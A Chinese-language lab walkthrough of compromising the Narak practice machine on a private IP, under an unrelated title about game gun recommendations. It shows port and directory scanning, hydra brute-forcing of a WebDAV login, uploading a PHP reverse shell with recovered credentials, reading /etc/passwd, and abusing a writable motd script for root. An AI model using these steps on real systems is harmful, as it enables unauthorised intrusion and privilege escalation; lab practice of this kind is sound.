鹰眼模式推荐枪(Narak靶机笔记)

目标IP:192.168.3.134

发现开放的端口

sudo nmap -p- 192.168.3.134

鹰眼模式推荐枪(Narak靶机笔记)(1)

探索端口的拥有的路径

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.3.134

鹰眼模式推荐枪(Narak靶机笔记)(2)

webdav账号密码登录

在这里发现弹出来了一个账号密码的登录窗口,使用cewl生成语义化的字典

cewl http::/192.168.3.134 -w dict.txt

然后尝试破解密码

hydra -L dict.txt -P dict.txt 192.168.3.134 http-get /webdav -v

鹰眼模式推荐枪(Narak靶机笔记)(3)

上传文件到FTP

davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg

鹰眼模式推荐枪(Narak靶机笔记)(4)

至此可以知道可以上传shell脚本到远程的FTP服务

davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadl.php

鹰眼模式推荐枪(Narak靶机笔记)(5)

探索靶机

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

鹰眼模式推荐枪(Narak靶机笔记)(6)

发现一个脚本,解密得到: chitragupt

利用 cat /etc/passwd 得到另一个用户: inferno

鹰眼模式推荐枪(Narak靶机笔记)(7)

发现该系统上有三个账户,为了得到好用的shell操作环境那么:ssh inferno@192.168.3.134,继续查找root权限且当前用户可写的文件

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

鹰眼模式推荐枪(Narak靶机笔记)(8)

nano /etc/update-motd.d/00-header

google得到这个文件的作用:Forbidden - Stack Exchange

修改欢迎语,重新登录

鹰眼模式推荐枪(Narak靶机笔记)(9)

DONE

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页